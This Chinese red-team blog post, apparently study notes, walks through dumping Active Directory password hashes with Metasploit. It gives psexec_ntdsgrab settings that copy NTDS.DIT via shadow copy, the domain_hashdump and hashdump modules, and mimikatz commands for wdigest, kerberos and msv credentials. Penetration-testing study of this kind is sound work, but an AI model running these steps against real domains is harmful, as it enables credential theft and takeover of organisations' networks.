使用 Metasploit 获取哈希或域内哈希值

admin 2020年11月28日12:02:32评论546 views字数 833阅读2分46秒阅读模式

渗透攻击红队

一个专注于红队攻击的公众号

使用 Metasploit 获取哈希或域内哈希值


大家好,这里是 渗透攻击红队 的第 35 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更



Metasploit

psexec_ntdsgrab 模块的使用


在 MSF 中使用 psexec_ntdsgrab 模块:

use auxiliary/admin/smb/psexec_ntdsgrabset rhosts 192.168.2.25set smbdomain god.orgset smbuser administratorset smbpass Admin12345

使用 Metasploit 获取哈希或域内哈希值

设置完后然后执行 exploit 运行(要运行两次,该脚本使用卷影拷贝服务):

使用 Metasploit 获取哈希或域内哈希值

可以通过SMB服务直接与域控制器进行身份验证,创建系统驱动的卷影复制,并将NTDS.DIT和SYSTEM hive的副本下载到Metasploit目录中。这些文件可以与impacket等其他工具一起使用,这些工具可用于执行活动目录密码哈希值的提取。ntds.dit 和 SYSTEM会放在 /root/.msf4/loot/ 文件夹下:

使用 Metasploit 获取哈希或域内哈希值

之后就可以使用 impacket 工具包等解析 ntds.dit文件,导出域账号和域散列值了。


Metasploit 会话获取域账号和哈希值


首先是使用 msf 反弹了一个域控的 shell:

使用 Metasploit 获取哈希或域内哈希值

然后使用 MSF 的后渗透模块:

use post/windows/gather/credentials/domain_hashdumpset session 2

使用 Metasploit 获取哈希或域内哈希值

然后运行 exploit :

使用 Metasploit 获取哈希或域内哈希值

但是利用失败了,我也不知道为啥。

还可以使用 hashdump 来导出用户 hash:

使用 Metasploit 获取哈希或域内哈希值

还可以通过 MSF 加载 mimikatz 来读取密码:

# 加载mimikazload mimikatz

使用 Metasploit 获取哈希或域内哈希值

# 抓取明文密码wdigest 

使用 Metasploit 获取哈希或域内哈希值

# 抓取明文密码kerberos

使用 Metasploit 获取哈希或域内哈希值

# 抓取加密后的ntlm、lm密码msv

使用 Metasploit 获取哈希或域内哈希值


使用 Metasploit 获取哈希或域内哈希值

渗透攻击红队

一个专注于渗透红队攻击的公众号

使用 Metasploit 获取哈希或域内哈希值



使用 Metasploit 获取哈希或域内哈希值
点分享
使用 Metasploit 获取哈希或域内哈希值
点点赞
使用 Metasploit 获取哈希或域内哈希值
点在看

本文始发于微信公众号(渗透攻击红队):使用 Metasploit 获取哈希或域内哈希值

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年11月28日12:02:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用 Metasploit 获取哈希或域内哈希值https://cn-sec.com/archives/191248.html

发表评论

匿名网友 填写信息